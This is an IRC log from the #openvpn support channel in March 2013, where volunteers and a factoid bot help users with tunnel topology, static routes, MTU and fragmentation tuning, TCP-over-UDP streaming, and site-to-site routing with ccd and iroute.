00:12 < Poster> yep ; 00:12 < Poster> sudo iptables -L -n 00:12 < Poster> will show the filter table 00:12 < Anonmoose_> hmm 00:12 < Anonmoose_> Chain INPUT (policy ACCEPT) 00:12 < Anonmoose_> target prot opt source destination 00:12 < Anonmoose_> Chain FORWARD (policy ACCEPT) 00:12 < Anonmoose_> target prot opt source destination 00:12 < Anonmoose_> Chain OUTPUT (policy ACCEPT) 00:12 < Anonmoose_> target prot opt source destination 00:12 < Anonmoose_> that's it :/ 00:12 < Poster> bummer 00:13 < Poster> ok and just to confirm, if you type ifconfig on your Debian host, you see 10.8.0.6 on a tap/tun adapter? 00:13 < Anonmoose_> yup 00:13 < Anonmoose_> inet addr:10.8.0.1 P-t-P:10.8.0.2 Mask:255.255.255.255 00:13 < Anonmoose_> or hmm 00:13 < Anonmoose_> not .6 lol 00:13 < Poster> well that changes a bit 00:13 < Anonmoose_> o_O 00:13 < Poster> on your Windows host, type 00:14 < Poster> route delete 8.8.8.8 mask 255.255.255.255 10.8.0.6 00:14 < Poster> route add 8.8.8.8 mask 255.255.255.0 10.8.0.1 00:14 < pekster> No 00:14 < pekster> For net30 that's not how it works 00:14 < pekster> !net30 00:14 <@vpnHelper> "net30" is "/30" is (#1) http://openvpn.net/index.php/documentation/faq.html#slash30 explains why routed clients each use 4 ips, or (#2) you can avoid this behavior with by reading !topology 00:14 < pekster> 10.8.0.6 is the peering IP in the /30 subnet 00:14 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 00:14 < Anonmoose_> hmm The route deletion failed: Element not found 00:14 < pekster> It's PtP; it's quite possible to set up asymettric IPs routes 00:15 < pekster> (and in the case of net30, it is set up like this) 00:15 < pekster> Did you see this yet? 
It sounds like some of your routes aren't going across the link when you want them to: 00:15 < pekster> !redirect 00:15 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 00:15 <@vpnHelper> http://ircpimps.org/redirect.png 00:16 < Poster> wouldn't it be 10.8.0.0 - network ; 10.8.0.1 - host 1 ; 10.8.0.2 - host b ; 10.8.0.4 - broadcast ? 00:16 < Anonmoose_> nice chart lol 00:16 < pekster> Poster: For the server. You cannot access that inside the virtual /30 for the client 00:16 < Poster> I was trying to talk through adding a static route via 10.8.0.1 to see if it would pass the traffic 00:16 < pekster> Hence the client uses .6 and .5 00:16 < pekster> Right, you can't do that Poster 00:16 < pekster> It's not "on-link" on the virtual faked /30 00:16 < pekster> Of course, 'topology subnet' fixes that, just like the bot's output said 00:17 <@EugeneKay> Actually, that bot factoid doesn't say that. 00:17 <@EugeneKay> !/30 00:17 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf 00:17 <@EugeneKay> That one doues. 
00:17 < Anonmoose_> !nat 00:17 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto 00:17 < pekster> EugeneKay: Hmm, too many similar factoids :P 00:17 <@EugeneKay> pekster - read net30 closely; it's an old copy of /30 ;-) 00:18 < Poster> ok I guess I was used to manually assigning each side when using a /30 00:18 < TORcruzer> pekster: You you think I should try adding --fragment or --mssfix to help fix UDP problem... Or both? 00:18 < Poster> haven't used that approach ; I get it now 00:18 -!- dfoolz [~Anon@fuge.it] has joined #openvpn 00:18 < dfoolz> :| 00:19 < pekster> TORcruzer: First make sure you've set everything up on that flowchart correctly, and verify a ping to some external host (8.8.8.8 works) flows as expected across the VPN. Then see if it's an MTU issue by sending a packet at your MTU across the VPN to the same external host 00:19 < dfoolz> uh oh. i just kicked my server offline with faulty iptable parmaters :| 00:19 <@EugeneKay> Sweet. 
00:19 < pekster> If the first test works but the 2nd fails, you have MTU issues that need fixing with fragment, or possibly by using the --mtu-test feature that will tell you exactly what the detected MTU is (that'll take a few minutes to run) 00:20 < pekster> Then turn around and apply that value; see the --mtu-test option in the manpage for specifics 00:20 < TORcruzer> pekster: Okay, I'll report back 00:20 -!- TORcruzer [~TORcruzer@gateway/tor-sasl/torcruzer] has quit [Quit: WeeChat 0.4.0] 00:21 * pekster awaits IPv6's arrival where PMTU-discovery is built into the protocol's design better 00:23 -!- Anonmoose_ [~Anon@94.75.243.165] has quit [Ping timeout: 264 seconds] 00:27 < Poster> I do wonder if it will ever arrive 00:28 < pekster> Nothing really requires native v6, so ISPs & mfgr's won't make it a priority. Because of that, companies hosting content don't either. It's a nasty cycle, ending with more NAT for everyone. See RFC6598 for a wonderful example 00:29 < pekster> On the plus side, OpenVPN >=2.3.0 supports v6 now :) 00:29 < Poster> that's good ; yeah I see it as the whole chicken and egg thing 00:30 < Poster> if more client demand existed, the providers would probably invest the resources to get there ; but since it's not there the clients seem to be making due 00:31 < Poster> I think cellular providers use ipv6 inside their networks for data, but probably hide behind ipv4 for most web access 00:33 <@EugeneKay> Stop whining and start using 00:34 < pekster> Hey, I'm doing my part. ISP doesn't do v6, so I'm on Freenode via a broker :) 00:34 <@EugeneKay> Every time you say "IPv6 is a chicken and egg problem" is that much less time spent becoming the chicken. 
00:34 * EugeneKay bawks
00:34 < Poster> heh
00:34 < Poster> it doesn't matter a whole lot to me
00:34 < pekster> I need to get my phone doing v6 via my OpenVPN connection at home too
00:34 < pekster> That'd be nice
00:35 < Poster> I'd have to get ipv6 from somewhere else too
00:35 < pekster> HE or sixxs offer free brokering services
00:39 < TORcruzer> I tried setting the fragment REALLY low, all the way down to 1000, and had mssfix in there. Still on UDP I can ping, DNS, 'small' http transfer. But say I wget google.com, it always stops after 5 packets
00:40 < pekster> And you learned what by doing pings with the DF ("don't fragment") bit set and running --mtu-test ?
00:41 < TORcruzer> ? I have never done that... I did run this and it works fine: ping -M do -s 1472 ... This is the HTTP that does work: curl --get http://tnx.nl/ip
00:41 < TORcruzer> The ping ended in 8.8.8.8
00:42 < TORcruzer> and the other end of the TUN point-to-point link
00:42 < pekster> Right, so that 1472 ping (max you can send in ICMP data with all the overhead on a 1500MTU link) means any fragmentation is working properly between your VPN peers
00:43 < pekster> It's also possible any --comp-lzo setting is interfering with the ping test since it compresses data, likely interfering with the actual resulting packet sizes
00:43 < TORcruzer> pekster, okay. Do you have any other ideas why I can only send 5 packets?
00:44 < pekster> 5 packets? As in you can ping 5 times but the 6th fails? That sounds like DPI/IDS
00:44 < pekster> ie: something actively stopping the traffic
00:45 < TORcruzer> Aw, okay. Oh, sorry, that was confusing... I mean any website other than http://tnx.nl/ip that I try to go to always stops after the first GET, 5 packets in
00:45 < TORcruzer> In Wireshark listening on the Tun interface
00:47 < TORcruzer> I see the ACK from the GET but then it ends.
00:48 < pekster> Is the MSS set properly in the SYN and SYN+ACK during establishment?
00:49 < pekster> If you're using --fix-mss it should be
00:51 < TORcruzer> I tell Google mss 1460 .. Google tells me mss 1368
00:52 < TORcruzer> ... i.e. SYN mss 1460 : SYN, ACK 1368
00:52 < pekster> 1460 sounds wrong if you're still using 1400 or 1200 or 1000 or something in your --fragment line
00:53 < TORcruzer> That is what happened on default settings.... does it look okay then?
00:54 < TORcruzer> Would you like me to try again with fragment 1000 and mssfix added?
00:54 < pekster> Manpage says 1450 is the default, but 1460 might be okay assuming PMTU is working
00:56 < pekster> Try using '--comp-lzo no' on both sides first, to rule out weirdness in your DF ping test. Then sure, try --fragment X --mssfix (where X can be 1000 if you want to start there. Usually values like 1300, 1200, 1000, etc are common first guesses)
00:56 < pekster> I should have noted that earlier, but I didn't think about the compression playing a role at the time
00:56 < TORcruzer> Okay, I'll do that and also check to make sure the mss is really being set
00:57 < pekster> It's very likely you have MTU problems since the next thing after the 'GET' request is the data
00:57 < pekster> And that'll likely span several packets or more
00:57 < TORcruzer> That sounds right to me too. Also considering that small ones like the HTTP request do go through.
00:57 < pekster> Hopefully you can duplicate your symptoms with simple pings
00:57 < TORcruzer> Okay
00:57 < pekster> ie: no compression should leave the encapsulated data the same size as random "uncompressable" data too
00:58 < TORcruzer> will do
01:05 < TORcruzer> Okay, what does (truncated) mean? The max I can ping at is 64... ping -M do -s 64 8.8.8.8 .. before I see (truncated)
01:05 < pekster> Oh, the peer is probably only returning 64 bytes
01:06 < pekster> Yea. Another host would be wise then, since you want to make sure the MTU works in both directions. The good news is it got out okay
01:06 < TORcruzer> Should I have been trying to ping the Tun interface on the server?
01:06 < TORcruzer> Ya :p
01:07 < TORcruzer> I'll try the other end of the link... one sec
01:07 < pekster> Possibly, although that won't verify that it works for external hosts (you'd presume it would, but PMTU between your server and your desired endpoint could still also be hosed)
01:07 < pekster> That's likely a separate issue though
01:08 < pekster> google.com seems to do the right thing. 8.8.8.8 replies only 64 bytes back, and kernel.org drops too large of pings
01:08 < TORcruzer> Okay well I'll verify that first. Do you think my other VPS would be a good thing to ping?
01:08 < TORcruzer> Okay, I'll do google.com
01:08 < pekster> Sure. Start with the VPN endpoint too
01:08 < TORcruzer> Okay
01:08 < pekster> At least verify the link works, then work out from there
01:29 < TORcruze1> Okay, so it seems the max is mss 548
01:30 < TORcruze1> It works with that. The way I found it was to just ping the server without going through OpenVPN. That was the highest it would let me go. So I set OpenVPN to fragment on that and it all seems to be working now :)
01:31 < TORcruze1> That does seem really small though? Should I try OpenVPN higher than that?
01:32 < TORcruze1> It is hard to test, but it looks like I am getting 100KB/s more now. I should try turning on lzo compression and I bet I'd see even more speed.... Correct?
01:32 < TORcruze1> ... More than with TCP
01:33 < TORcruze1> I am basically watching YouTube. When the video first starts I am seeing a lot more speed.
01:34 < TORcruze1> ... I'll try those things and report back...
01:58 < TORcruzer> YES :) I am sooo happy. Thank you for all your help. Boy, I never would have figured that out.
01:59 < TORcruzer> On TCP I was seeing a max speed on the Tun interface of 257KB/s ... now on UDP with comp-lzo I am seeing a little over 400KB/s
02:00 < TORcruzer> Oh well, nmon now shows Peak Received 495KB/s !!! So cool. On TCP, no joke, Peak Received ~250-270KB/s
02:02 < TORcruzer> new peak 505KB/s :) ... Okay I'll stop posting now :p
02:11 < TORcruzer> Okay now 545KB/s. Lots of peaking over 500KB/s... So, OpenVPN is Open Source... I should look into what it would take to add a config flag to have OpenVPN do this ping testing for you... Hmm, I guess the problem would be that it would add a lot of time to startup.... Maybe I could just write a small Bash script and put it in the Arch Linux AUR...?
02:13 < pekster> Did you see/use --mtu-test? It does just that
02:14 < TORcruzer> Oh boy, really?
02:14 < pekster> Yup. I noted it earlier too
02:14 < TORcruzer> Shoot..
02:16 < TORcruzer> Okay, well I'll sign off now. BIG Thank You pekster :) While I should have read you tell me about --mtu-test... Thanks for helping me figure this out.
02:17 < pekster> 548 seems oddly close to 576 minus some overhead (not sure offhand how much that all accounts for)
02:18 < PG1> hello room
02:18 < pekster> It could be the host you're using (or some router en-route) somehow uses that as the MTU, although that's a goofy value since 576 is the unfragmented minimum packet size required to support in IPv4. Technically, IPv4 can work with an MTU as low as 68 bytes. It's valid to use such a low MTU, but not common
02:18 < TORcruzer> Oh ya, Frag needed and DF set (mtu = 576)
02:18 < pekster> Heh. Funny.
02:18 < PG1> can i transfer TCP packets (live stream) over a udp tunnel using openvpn?
02:19 < pekster> I think someone mis-read or mis-understood the spec somewhere along your path. Oh well, it's not technically misconfigured if you get the fragmentation needed reply
02:19 < pekster> PG1: Yup, you can send any IP data (using tun) or Ethernet data (using tap) across the link
02:19 < PG1> pekster: and can that tunnel be encrypted?
02:19 < pekster> This applies equally to UDP or TCP as your encapsulating transport. Use of UDP is preferred for a variety of performance reasons
02:19 < pekster> Yup
02:20 < PG1> is it a good idea to send a live video webstream TCP based over a udp tunnel?
02:20 < PG1> tcp stream sent over a tcp tunnel is causing problems
02:20 < pekster> It's a good idea to use UDP always unless you cannot
02:20 < pekster> Right
02:20 < pekster> !tcp
02:20 <@vpnHelper> "tcp" is (#1) Sometimes you cannot avoid tunneling over tcp, but if you can avoid it, DO. http://sites.inka.de/~bigred/devel/tcp-tcp.html Why TCP Over TCP Is A Bad Idea. or (#2) http://www.openvpn.net/papers/BLUG-talk/14.html for a presentation by James Yonan (OpenVPN lead developer) or (#3) if you must use tcp, you likely want --tcp-nodelay
02:20 < TORcruzer> pekster: Aw, okay, that sounds right. Well, I'm getting good speeds, so I'm not too worried about it. When I get to school I'll set their network.
02:21 < TORcruzer> "Test their network"
02:23 < TORcruzer> pekster: Maybe my school has a different route to my server
02:25 < pekster> Standard traceroute tools can often identify the MTUs along a path, depending on configuration
02:29 < TORcruzer> New Peak 736.5 KB/s over UDP :) Okay I am really signing off. I am just being noisy now...
02:29 < TORcruzer> Goodbye, thanks :)
02:32 < PG1> pekster: any documentation you can point me to ?
02:32 < pekster> !howto
02:32 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
02:39 < PG1> pekster: in my case with streaming in tcp, would route or bridge mode be better?
02:40 < pekster> Routing
02:40 < pekster> !tunortap
02:40 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you
02:40 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun.
02:42 < PG1> pekster: i see that by default openvpn works on udp not tcp tunneling
02:42 < pekster> OpenVPN works with either. The default is UDP, but nothing needs to change besides your configuration for it to "work"
02:59 < pekster> You can use any address space available to your environment. If you don't have a block of publicly-routable IPs, use RFC1918 space
02:59 < pekster> !1918
02:59 <@vpnHelper> "1918" is (#1) RFC1918 makes three unique netblocks available for private use: 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 or (#2) see also: http://en.wikipedia.org/wiki/Private_network or http://www.faqs.org/rfcs/rfc1918.html or (#3) Too lazy to find your own subnet? Try this one: http://scarydevilmonastery.net/subnet.cgi
04:03 < PG1> on my openvpn server i am receiving this kind of error from time to time: read UDPv4 [ECONNREFUSED]: Connection refused (code=111
04:23 < PG1> anyone?
05:10 < pppingme> PG1 might just be someone trying to port knock or something, are you seeing a real problem?
05:14 < PG1> pppingme: yes
05:15 < PG1> pppingme: what is port knock
05:17 < pppingme> PG1 what's the problem you're seeing?
05:18 < PG1> pppingme: i am trying to do some livestreaming so i am using tcp over udp, what i see is when the client drops connection for like 1sec the stream stops even though the tunnel stays there
05:19 < PG1> so i have to refire the stream every time
05:20 < pppingme> PG1 you're using UDP for the vpn, right?
05:20 < PG1> pppingme: yes
05:20 < pppingme> then your stream is TCP, right?
05:20 < PG1> pppingme: correct
05:21 < pppingme> in general, unless there's a good reason to do otherwise, streaming should be done via UDP, there's about a 1000 good reasons for that and hardly any good reasons to go UDP
05:21 < pppingme> but..
05:21 < pppingme> setting that aside
05:21 < pppingme> if you do a nice long ping through the tunnel, does it run clean?
05:22 < PG1> well the cutoff is not seen, only the output freezes
05:22 < PG1> if i run a ping in parallel it would stay working
05:22 < pppingme> that's just a characteristic of how TCP works
05:23 < pppingme> so you don't see ANY packet loss when you ping?
05:24 < PG1> let me check
05:27 < PG1> pppingme: http://pastie.org/7088788
05:28 < PG1> you see the lag times?
05:30 < pppingme> that just means something else is hitting the connection
05:31 < pppingme> you didn't post stats at the end of the ping?
05:31 < PG1> the weird thing is, the stream stops at the time the ping is very reliable and does not show any disconnections
05:31 < PG1> so for example stream stops when ping is 200ms
05:32 < pppingme> is there any dsl involved?
05:33 < PG1> 3g
05:34 < pppingme> streaming over tcp is bad to start with, you complicate that with a vpn and 3g, that just makes it worse, the thing about tcp is one little minor hiccup brings it to a halt until the issue (lost or corrupt packet or whatever happened) is corrected
05:35 < pppingme> that's fine if you're downloading a file, in fact, it's probably desirable, since 100% accuracy is important, but when you're streaming video, who cares, worst case is you lose a frame of video, that's why UDP is better for streaming.
05:35 < pppingme> is there a reason you can't stream via udp?
05:36 < PG1> i want to cover the stream on all devices/platforms including android iphone mac linux windows
05:36 < PG1> so my solution is fine now with tcp but i dont know if it will be fine with udp
05:36 < pppingme> as long as you stream over tcp, you're going to be fighting this issue
05:36 < PG1> lot of devices dont support udp streams
05:37 < pppingme> it's not up to the device, it's up to what software you're running on the device
05:38 < pppingme> and every major video player out there, as well as flash and a million other ways to do it can support streaming over udp
05:39 < pppingme> believe it or not, what you're seeing isn't a bug or really even an issue in most people's eyes, it's a feature, it's the way TCP is supposed to work
05:41 < pppingme> every once in a while, you're going to lose a packet or a packet will come across corrupt, that's just a fact of life, that's what makes tcp so good, it can detect these situations and correct for it, but all of that takes time, but allows for extremely high accuracy when moving files around, but who cares when it's for video or audio, no one is going to notice a missing frame..
05:42 < pppingme> thus, UDP
05:42 < jzaw> 1/24th of a second .. just a blink
05:42 < pppingme> he's gone
05:42 < jzaw> ah
05:43 < pppingme> I dunno why people insist on streaming video over tcp over a vpn, over 3g
05:43 < jzaw> i've been running (am running) a tcp tunnel but only cos i found voip less artifacty than over udp
05:43 < jzaw> but i'm thinking of going to udp anyway
05:44 < jzaw> cos my sftp speeds are shit
05:44 < jzaw> even with tcp-nodelay
05:44 < pppingme> that's interesting..
05:44 < pppingme> that you think voip sounds better over a tcp tunnel vs a udp tunnel..
05:44 < jzaw> i'm 2,000km from my server ... and a lot of PL networks are PANTS! and very lossy
05:45 < jzaw> yeah 722 is a nice sounding codec when pkts are arriving
05:45 < jzaw> but it's very sensitive to losses
05:45 < jzaw> quickly starts sounding very very bad
05:46 < pppingme> I mainly only do u-law
05:48 <@EugeneKay> pppingme - over the MOON
05:48 < jzaw> pppingme, aye but it's a good litmus test to try 722 :)
05:51 * jzaw goes to flash a freshly baked openwrt bin to his tplink ... fingers crossed
12:08 < Cubox> hi :)
12:08 < Cubox> I have a question about the android app.
12:08 < Cubox> In the notification bar, I have TWO openvpn things...
12:08 < Cubox> I know that one is VPNService, but how to remove the other?
21:21 < noahmehl> i'm using openvpnas
21:22 < noahmehl> and I'm wondering how group permissions work in conjunction with ldap
21:22 < noahmehl> I can't find any documentation explaining how to use an ldap group as a group in openvpnas
21:22 < noahmehl> anyone have experience here?
21:24 < noahmehl> oh, there's a different room for this
21:24 < pekster> /TOPIC says:
21:24 < pekster> !as
21:24 < noahmehl> i'll post there
21:24 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server
21:24 < pekster> :)
21:25 < noahmehl> already beat you to it ;)
--- Day changed Sun Mar 24 2013
04:45 < jzaw> ping pekster
04:46 < jzaw> just pondering this split routing non def1 vpn
04:47 < jzaw> and the public ips i have on the client lan
04:50 < jzaw> if you remember pinging fuji-pl.dzki.co.uk (ipv4), the echo request comes down the vpn to the client router, then onto the client lan and hits the lappy, but the reply goes out the default route ie the nat
04:51 < jzaw> i can fix that on an individual basis on linux hosts by adding an ip table rule to detect where the request has come from
04:52 < jzaw> but that won't work for things like a pap2 voip ata
has joined #openvpn 06:10 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 06:56 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 07:07 < jzaw> pekster, i may have got it ! 07:36 -!- roentgen [~arthur@openvpn/community/support/roentgen] has quit [Ping timeout: 264 seconds] 07:54 -!- fluter [~fluter@fedora/fluter] has quit [Ping timeout: 258 seconds] 08:02 -!- penk [~dave@216.142.113.233] has joined #openvpn 08:45 -!- teknoprep [~quassel@c-50-152-69-94.hsd1.pa.comcast.net] has joined #openvpn 08:46 -!- teknoprep [~quassel@c-50-152-69-94.hsd1.pa.comcast.net] has quit [Changing host] 08:46 -!- teknoprep [~quassel@unaffiliated/teknoprep] has joined #openvpn 08:47 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 08:47 < teknoprep> how would i setup a single OVPN Server... then have 2 clients (these are site to site vpn's)... use the same OVPN server? do i have to create a different OVPN server for each remote site.. using a different port... and a different Transfport Network ? 08:48 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 08:53 -!- Volkswagner [~eric@cpe-24-161-55-139.hvc.res.rr.com] has joined #openvpn 08:55 < Volkswagner> Greetings, with the help from Poster, I have setup server on my router and connect via client, routed tun connection. 08:55 < Volkswagner> configs here http://pastebin.com/vv93Y4Hx 08:56 < Volkswagner> It appears the when the client connects is shows the Tun0 ip address, I expected to see the remote lan address, is this normal? 08:58 < Volkswagner> here is result from ifconfig on the mac while tunnel is active http://pastebin.com/YVaG6FGA 08:59 < Volkswagner> With tunnel connected, I can ssh into client located on servers LAN, but the ssh machine sees my ip as 10.0.0.6 08:59 < jzaw> teknoprep not done it myself and in the absence of higher more knowledgeable answers 09:00 < rob0> Volkswagner, what's wrong with that? 
09:00 < jzaw> you just run a single instance and make sure your tun subnet has enough ips .. + maybe run topology /30
09:00 < Volkswagner> When checking the Openvpn server the /tmp/ipp.txt shows the same machine as Eric,10.0.0.4
09:00 < jzaw> so each subsequent client gets the next ip
09:01 < teknoprep> jzaw... here is where i am stumbling... how will it know to route to a remote network
09:01 < Volkswagner> rob0, I'm not sure if it is wrong, it is not what I expected, I thought the tunnel ip's would be "invisible"
09:01 < teknoprep> each client will have a different subnet behind it
09:01 < jzaw> each remote network lan ips must be non clashing
09:01 < rob0> no. When you are using the tunnel IP address, that's what will show on the other side.
09:01 < teknoprep> this is a Site-Site / Hub & Spoke configuration
09:02 < jzaw> and you just route to that subnet down the tun
09:02 < jzaw> but each client needs ccd/clientcertcommonname file
09:02 < teknoprep> how does the openVPN server know to "just route" down the correct tunnel
09:02 < jzaw> to define its routes etc
09:03 < Volkswagner> rob0, ok the result from ifconfig just seemed a bit weird to me >>> inet 10.0.0.6 --> 10.0.0.5 netmask 0xffffffff
09:03 < Volkswagner> also the ip did not match with /tmp/ipp.txt
09:04 < Volkswagner> I'm getting high latency, and I'm wondering if it is just my test environment (cellular > wifi share > tunnel)
09:05 < teknoprep> jzaw... when a client connects to the server... in the client config can i tell the server what networks exist on the client side ?
09:05 < rob0> I guess that's 10.0.0.6 on your end, 10.0.0.5 is the peer. It sounds like you're using "--topology net30", and if so, why? It's rarely a good idea, only needed to support ancient openvpn clients.
09:05 < teknoprep> that would make everything work
09:05 < rob0> !clientlan
09:05 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a
09:05 <@vpnHelper> better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png
09:06 < jzaw> teknoprep, what rob0 said ^^^^
09:08 < Volkswagner> rob0, I don't have --topology net30 on my config, unless it is a default on OpenVPN @openwrt, it should not be the reason???
09:10 < Volkswagner> http://ircpimps.org/clientlan.png = 404 not found
09:11 < jzaw> Volkswagner, not 404 for me
09:11 < rob0> wfm also
09:14 < Volkswagner> hmn, must be an opendns issue, works via hidemyass.com, but not on any of my router connected clients
09:14 < rob0> haha maybe opendns protecting you from "pimps" :)
09:16 < Volkswagner> is there a command I can use to check all server configs? ie: find defaults not listed on server config file?
09:18 < teknoprep> it'll probably be easier to setup 2 vpn servers on one server using different ports
09:19 < jzaw> teknoprep, you still have to set the routes up
09:19 < teknoprep> thats easy to do
09:19 < jzaw> if you know them for two instances
09:19 < jzaw> you know them for one
09:20 < teknoprep> how do i push a static IP to the client
09:20 < teknoprep> ccd ?
09:20 < teknoprep> i am not quite understanding ccd
09:21 < teknoprep> i will have a tunnel network... lets say i make it a /28 so i can encompass all the remote clients
09:22 < teknoprep> each remote client will have a /24 behind them
09:22 < teknoprep> i then use iroute and route to route to and from those networks
09:22 < teknoprep> the issue i am running into is how to statically assign a tunnel network IP to each client
09:22 < teknoprep> so the routes never change
09:23 < jzaw> iroute in ccd file
09:23 < jzaw> each file is named as the commonname of the cert for that client
09:24 < jzaw> then a route statement in the main conf
09:24 < jzaw> for each client
09:24 < jzaw> if ive got it right ... not done it myself ... so it bears correcting
09:24 < jzaw> a /24 may be a tad excessive
09:24 < jzaw> how many clients do you have?
09:25 < teknoprep> http://openvpn.net/index.php/open-source/faq/77-server/273-qifconfig-poolq-option-use-a-30-subnet-4-private-ip-addresses-per-client-when-used-in-tun-mode.html
09:25 <@vpnHelper> Title: "ifconfig-pool" option use a /30 subnet (4 private IP addresses per client) when used in TUN mode? (at openvpn.net)
09:25 < teknoprep> 6 clients
09:25 < teknoprep> all clients are interconnected by IPsec
09:25 < teknoprep> we are adding all 6 clients to then connect over OpenVPN to an OpenVPN server in Amazon AWS
09:25 < teknoprep> i guess i have to create a /30 network for each client
09:28 < teknoprep> so i don't think i can do this with a shared key
09:28 < teknoprep> i have to use SSL/TLS
09:28 < teknoprep> each client must have a different Cert if i am understanding this correctly
09:28 < teknoprep> so OpenVPN can differentiate which client is connecting
09:29 < jzaw> you dont need a /30 per client if you use topology /30
09:30 < jzaw> and yes its prob better to use a cert per client id have thought
09:30 < teknoprep> ?
09:30 < jzaw> !/30
09:30 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf
09:30 < jzaw> !topology
09:30 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions. or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this.
09:30 < teknoprep> no windows clients here
09:31 < rob0> Volkswagner, verb 4 IIRC prints out all the settings.
09:34 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Read error: Operation timed out]
09:39 < jzaw> teknoprep, works with linux clients too afaik
09:47 < teknoprep> hey looks like i did it
09:47 < teknoprep> w0ot
09:47 < teknoprep> what a PITA
09:47 < teknoprep> lol
09:47 < jzaw> nice
09:48 < jzaw> multi instances
09:48 < Volkswagner> rob0, thanks. I have changed the server config to option 'verb' '4', and tried start from command line, no extra output
09:48 < jzaw> or single ?
09:48 < teknoprep> single
09:48 < teknoprep> all on same port
09:48 < Volkswagner> what might I be doing wrong?
09:48 < teknoprep> 1194
09:48 < jzaw> good goo
09:48 < jzaw> d
09:48 < teknoprep> multi instance would have been easy to do
09:48 < teknoprep> why do it the easy way
09:48 < jzaw> hehe ... well i have an unusual setup myself
09:48 < jzaw> too
09:49 < teknoprep> i am not used to using SSL/TLS Peer to Peer configurations.. i usually just do a shared key
09:49 < teknoprep> i had to have a TLS Auth license
09:49 < jzaw> in my case ive got a no nat server end and a nat client end with hosts behind
09:49 < teknoprep> or cert
09:50 < teknoprep> ahh
09:50 < jzaw> to which ive given nat public ips
09:50 < teknoprep> i was thinking about building a network from my house to my office
09:50 < jzaw> and are only accessible via the vpn
09:50 < teknoprep> and pass down VLAN's
09:50 < teknoprep> can i do 802.1q over OPVN Bridge ?
09:50 < jzaw> but i dont send all traffic down the vpn ... those client end hosts can browse normally out of the nat
09:51 < jzaw> bridge is bridge and can do anything a bridge can do
09:51 < jzaw> layer 2
09:51 < teknoprep> nice
09:55 < teknoprep> w0ot
09:55 < teknoprep> it worked
09:55 < teknoprep> 10.0.1.1 and 10.0.2.1 are differentiated by the client certs
09:55 < teknoprep> this rocks
09:56 < teknoprep> now i know how to finish up to make routing work
09:56 < jzaw> the problem with split routing and public ips is that a ping to the client end host on an ip enters via the vpn ... but leaves via the default route ie the nat ... no ping reply
09:56 < teknoprep> since they will always get the same IP
09:56 < jzaw> thats the idea
09:56 < jzaw> predictable routes
09:56 < teknoprep> thats what i was trying to wrap my head around earlier
09:56 < teknoprep> i couldn't figure out how the clients would always get the same IP address if they were on the same openvpn instance
09:56 < teknoprep> now i get it
09:56 < teknoprep> lol
09:57 < jzaw> the tricky thing is that you have to have the iroute in the ccd file and route in the conf
09:57 < teknoprep> what is the iroute command for ?
09:57 < teknoprep> !iroute
09:57 <@vpnHelper> "iroute" is does not bypass or alter the kernel's routing table, it allows openvpn to know it should handle the routing when the kernel points to it but the network is not one that openvpn knows about. This is only needed when connecting a LAN which is behind a client, and therefore belongs in a ccd entry. Also see !route and !ccd
09:58 < teknoprep> so right now... on each client specific config i have ... push "route 10.254.1.0 255.255.255.0";
09:58 < teknoprep> this is the network inside my Amazon AWS
09:58 < jzaw> read up how to push different ifconfig settings
09:59 < teknoprep> i will also need to setup an "iroute 10.20.1.0 255.255.255.0"; first site
09:59 < teknoprep> this needs to be in the server.. am i understanding this correctly ?
10:06 < teknoprep> different ifconfig settings ?
10:13 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
